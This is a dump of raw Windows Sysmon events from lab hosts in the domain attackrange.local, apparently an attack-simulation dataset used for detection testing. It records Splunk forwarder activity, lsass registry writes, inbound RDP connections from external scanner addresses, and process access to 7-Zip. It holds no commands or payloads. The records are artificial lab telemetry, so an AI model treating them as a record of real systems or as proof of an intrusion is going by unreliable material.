Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.864{A7A01FEF-EAD1-607E-640B-00000000BB01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000062845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.192{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA9CC3F07BD94DBB7BB56F7A95F5243,SHA256=560FE98D8696136F5E0FC5392673E393388A8D344EE83087E5D72B3CAD382862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:06.285{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E19311BFEBC992061B00194B83A6C92B,SHA256=7E8516F3A6CF41D3F9D9AD3403F355887C7D74E9FF524F664D16275E82FBA008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:06.223{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E988B11721E75DBD1D6A0A0DA3C92DC7,SHA256=E04800D5DD75C6EB796274B391630FAE3F9534C06EC71CF77399C1939FF45709,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:04.575{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24075-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049195Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:04.780{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62414-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049194Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:04.220{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53497-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049193Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:06.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81C7A71FB6AA9521E722B0C45EDE156F,SHA256=1DBC266F16B6E6E4DC8A5F9C6B857D3461824889C8E24110018D335163090619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:07.254{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0268D7FEDBC544C550B58AD9143641D7,SHA256=CDEABBC6FA24D2EC11C34EDDA769A3EDA06E8CB5C40091B581FBFAEEBDCAEB2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.217{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57436-false10.0.1.12-8000- 354300x800000000000000062857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.058{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-17238-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000049207Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000049206Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00c6e1d1) 13241300x800000000000000049205Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ec-0x7dcccd1f) 13241300x800000000000000049204Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f4-0xdf91351f) 13241300x800000000000000049203Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0x41559d1f) 13241300x800000000000000049202Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000049201Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00c6e1d1) 13241300x800000000000000049200Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ec-0x7dcccd1f) 13241300x800000000000000049199Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f4-0xdf91351f) 13241300x800000000000000049198Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:07.625{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0x41559d1f) 23542300x800000000000000049197Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:07.453{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37A63CDD325ED898746203EB7464F5ED,SHA256=3C67CD21298F1419EBADF2687950B42E558E4B0CC9CD0938F01BA51032A4B9A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049196Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:07.000{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E8CE42B617C5013EF4F1FC489FB775,SHA256=91FDAB47A5FAF762C854472159AFBD7C86D838C4793350A97B061C647FBCC1EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.692{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDFD6DC7CCCF9295619BE94F861B8A91,SHA256=49AD85CB2DE2AEF7D9193E64C623AA0162394F10C762012728D609ED0DC83714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.317{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72FE4A815AC22AC42B7EA78C869CB0B8,SHA256=3D7938469F7FC29E73857DAC9E4B5FBA55C9721E0A5530329589275EDEC6D5C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049210Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:08.703{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE2C8286C327837A2393B36A531FDBDD,SHA256=E6F089541897E26F2840DA483BD6A074A0509D01AC45AD7D97DFEEB2BBC1EC74,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049209Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:06.164{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60924-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049208Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:08.016{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDFBE3D01F588CEBCE2FE5F71E414B35,SHA256=965B9E9D2EB3665FC7F5BD6701EF86F67167790017D688AE72BB10881726DC40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.191{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.191{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.191{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.191{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:09.332{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39C7081C6A630D9A65FB583C2385B15,SHA256=D824D8FDE0464C1C1EEC87731FC8CD69C777B98EAFA261BC46AC78808B6F7975,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049211Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:09.032{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C03C3B903CF62C2A56D32C50588B578F,SHA256=4276E5780B21AFE9694081D277008FC370BB8FA1246E0B961EA5C5755030402A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:07.623{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50484-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.691{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1335FC5F76CB0D1380C938C196E1FCB6,SHA256=09642EB6A5E29FD74F039EEC2C8A32361C97A3FBB882F616B08F168FD7CAAE57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.582{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 